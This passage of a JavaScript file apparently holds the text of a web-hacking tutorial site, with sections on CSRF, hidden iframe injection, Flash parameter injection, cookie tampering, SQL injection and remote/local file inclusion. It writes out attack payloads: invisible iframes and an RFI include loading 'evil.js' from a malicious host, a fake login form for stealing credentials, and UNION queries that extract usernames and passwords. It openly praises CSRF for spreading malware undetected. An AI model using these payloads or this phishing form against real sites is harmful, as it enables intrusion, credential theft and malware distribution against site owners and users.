I would like to start this section by saying that sometimes the smallest thing can lead to the biggest problem.
We should always start our test by first examining the source code of the target web page. This can be accomplished by right clicking on the page and clicking on view source. Throughout the source code, be sure to examine the javascript, and any other files that are linked to the current page for possible directories that a password file could be stored. I suggest if you do not know html, javascript, php, and xml that you learn it before you try any of the tutorials on this site. Lets look at a simple example:
You are looking through source code and you come across a section that looks similar to this: <script src='../admin/myScript.js'>
At this point you know there is a directory called admin in the directory above the one you are in. Lets see if we can view that directory
In the address bar you would go to the last forward slash and type in ../admin/ this should give you a directory listing of the admin directory. This is just a simple example and will be the only one i will cover in this tutorial. ";
var csrf = "Cross Site Request ForgeryCSRF is a way that an attacker can cause the victim to exploit an xss vulnerability on a different website through a link or possibly an email without the victim knowing. Posting a link or a picture in a blog that the victim opens which then executes a command to inject code into another web site is a basic form of CSRF. Here is an example:
<img src='http://vulnWebSite.com/index.php?command to execute'>
This can be very a very good way to spread malware without detection by embedding the code into a XSS vulnerable site. Once a user logs in the command will be executed, and the server logs will reflect that the last user that was logged in is the one that is spreading the malware. More information can be found on the OWASP web site. ";
var iframe = "Iframe InjectionRealistically Iframe Injection is a form of Xss, well xss and rfi. The uses of this type of attack can vary, a while ago it was one of the main types of attacks on facebook. An attacker would add a friend, add a few comments to the page, and then inject a hidden iframe that could be used for a few things. Credential stealing, malware injection, defacement, adding friends from that persons friends list, etc. To elaborate there are a few ways to make an iframe invisible to the browser, here are some other examples.
<iframe src='http://www.malicious-site.com' height='0' width='0'></iframe>
<iframe src='http://www.malicious-site.com' style='visibility: hidden'></iframe>
Basic dos example to kick user off of the site, of course this is simulated and the cookie probably would not be set as user=someusername
<iframe src='<script>void(document.cookie=user='DdOSD')</script>'height='0' width='0'></iframe>
The use of iframes is limited to the users imagination, and there are many tutorials online that will help aid this documentation.";
var flash = " Flash Parameter InjectionFlash is found all over the web. There are many different ways to inject code into flash parameters, and many different ways to use each of them. I will not go into all of the different injection types but here are a few.
Injection through Html with Xss -mymovie.swf?vulnerableVariable=javascript: alert('Xss Test')
Injection through swf loading as parameter through DOM - http://vulnerableFlash.com#&glVar=javascript: alert('xss')
For other references about FPI please do further research there are many good examples on the OWASP website Here, along with what the vulnerable code looks like.
The best way to find holes in a flash application is to decompile it. This can be achieved by visiting the application online, then grabbing it from your temporary internet files(yes it is already been downloaded). Once you have the file you can use a decompiler to view the actionscript to find calls that are made outside of the application. Best advice is to learn some action script if you do not already know it, flash is everywhere and not going away anytime soon.
Flash Login's are a huge no-no! If you find one, chances are the password is embedded in it or a file very close by. ";
var code = "Code Injection and Session HijackingCode injection can be performed many different ways one of my favorite is through mis-configured server that allow URL file access. Code can be injected this way through the use of RFI which i cover in a different document. One of the most basic ways that code injection can be used is through cookie tampering. Cookie tampering is very easy to perform and even easier to perform authentication forgery. Along with cookie tampering and cookie stealing comes session hijacking. Session hijacking is again pretty easy to perform, someone clicks a link the attacker posts and their credentials are stolen. In essence clickjacking is performed the same way, someone clicks a link in their or in a flash application and they are redirected to a page that can steal their credentials, inject their computer with malware, a backdoor, or possibly even command injection.
Let's take a deeper look at code injection shall we. To start injecting code into a cookie is performed with the void tag at the beginning of the script like so:
javascript: void(document.cookie='user=admin');
This is done through the address bar. If we want to expand a bit, let's take it to the next level. If a vulnerable php application is found we can inject code directly into the tag in the same manner. For example:
javascript: void(document.forms[0].vuln = document.write('<script>alert(document.vulnerable='true')</script>'));
An example of code that could be used in the blog posting on the site for cookie stealing is:
admin wrote: Please must login to view this posting
<input type='text' name='uname' />
<input type='password' name='pass' />
<input type='submit' value='Login' onclick='var phish=new ";
var sql = "Sql InjectionSql injection is a way to get information from a database, login as an authenticated user, or even delete records in a database. Sql injection can be performed on Sql and MySql servers. Many times to find the vulnerable server an attacker will perform simple injections, then escalate to more complex ones. Lets start with an example url and sql injection.
Example:
http://injectable-site.com?page=1
We start by adding a simple single quote at the end like so:
http://injectable-site.com?page=1'
or
http://injectable-site.com?page=1 '1=1--
What we are looking for is an error code stating that we have an error in our sql. Now lets move on and find the number of columns in the table.
http://injectable-site.com?page=1 order by 1--
http://injectable-site.com?page=1 order by 2--
http://injectable-site.com?page=1 order by 3--
and so on, until the page says 'the page cannot be displayed', or 'unknown column'. This tells us that the number we entered before the page stated this would be our number of columns. Now lets try Unions to see if the command works. You would enter the text as follows:
http://injectable-site.com?page=1 union all select 1,2,3--
Bingo, the numbers printed to the screen unions work. Now lets check for column names:
http://injectable-site.com?page=1 union all select 1,2,3 from users--
If the number is still on the screen the column exists in the table, if not, keep guessing.
Now lets see if there is a username and password column
http://injectable-site.com?page=1 union all select 1,2,username,3 from users--
http://injectable-site.com?page=1 union all select 1,2,password,3 from users--
These are pretty basic examples, and the injections can get a lot more complex. There are many tutorials online that go into further detail about dropping tables, adding users, and many other things.
Sometimes injections are a simple 'or 1=1-- into a login form and we get admin or root, a lot of the time we have to work for it. ";
var rfi = "RFI & LFILocal File Includes is an easy way for an attacker to view files on a server that were not meant to be viewed or retrieved. again through a misconfigured server and bad coding an attacker can view local files in the current page. Here's an example of what a LFI attack might look like:
http://somesite.com?page=pass.txt
This is a very simple example of how this type of attack can be implemented. There are many different ways that someone could use this type of attack, another example is using Xss where pass.txt is to try and inject code on the page.
Remote File Includes can be used for just about every variation of Xss, Code Injection, Session Hijacking, and many others. A RFI attack might look like this:
http://somesite.com?page=http://www.malicious.site.com/evil.js
I have heard RFI called Code Injection, this can be a true statement if implemented correctly through the use of Xss. RFI is possible through a misconfigured server and bad coding. The server allows URL file access and the code leaves a query string empty for a page or file include this is true for both RFI and LFI. ";
var exp = "Exploit DevelopmentWe are currently working on this section and it will be done in a couple of weeks. ";
var ref = "ReferencesThis section is a collection of websites that are good for further reading on topics we discuss. Over time we will be adding links to other web sites as we find them.
1) Owasp
2) Xssed.com
3) ha.ckers.org
4) Iron Geek dot com
5) Exploit DB
6) Ethical Hacker Network
7) Metasploit Unleashed ";
$(document).ready(function(){
$("#tutCon").html(mainCon);
$("#xss").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(xss);
});
});
$("#review").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html(review);
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(review);
});
});
$("#csrf").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(csrf);
});
});
$("#iframe").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(iframe);
});
});
$("#flash").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(flash);
});
});
$("#code").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(code);
});
});
$("#sql").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(sql);
});
});
$("#rfi").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(rfi);
});
});
$("#exp").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(exp);
});
});
$("#ref").click(function(){
$("#tutCon").fadeOut(1000, function() {
$("#tutCon").html("");
});
$("#tutCon").fadeIn(1000, function() {
$("#tutCon").html(ref);
});
});
});
|